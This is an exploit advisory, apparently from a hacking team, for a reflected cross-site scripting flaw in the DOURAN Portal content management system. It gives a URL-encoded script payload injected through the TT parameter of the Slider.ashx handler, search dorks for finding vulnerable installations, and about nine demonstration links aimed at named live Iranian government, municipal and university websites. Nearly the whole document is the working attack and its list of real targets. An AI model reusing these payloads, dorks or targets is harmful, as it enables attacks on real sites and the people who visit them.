######################################################################################################################### # # # Exploit Title : DOURAN Portal XSS Vulnerabilities # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : www.DOURAN.com # # # # Tested ON : All ver 0f Douran Portal # # # # Security Risk : High # # # # Description : All target's iranian GOVerment websites # # # # DorK : "DOURAN Portal" # # # # OR : ""inurl:/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID="" # # # # ######################################################################################################################### # # # Expl0iTs: # # # # 1: www.DOURAN.com/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # Dem0 : http://mohrcity.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # Dem0 : http://www.tehranbtc.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # Dem0 : http://www.manzarie.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # Dem0 : http://kish.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # # # Dem0 : http://dcco.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # # # Dem0 : http://www.mashhadrizehcity.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # # # Dem0 : http://www.atr.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # # # Dem0 : http://www.fums.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # # # # Dem0 : http://jums.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert%280x00038E%29%3C/scRipt%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True# # # # # ######################################################################################################################### # # # Greetz : | MR.F@RDIN | Mr.PERSIA | H!dd$n D@gg$r | DR.OMID | Acc | & All Member Empror-Team | # # # #########################################################################################################################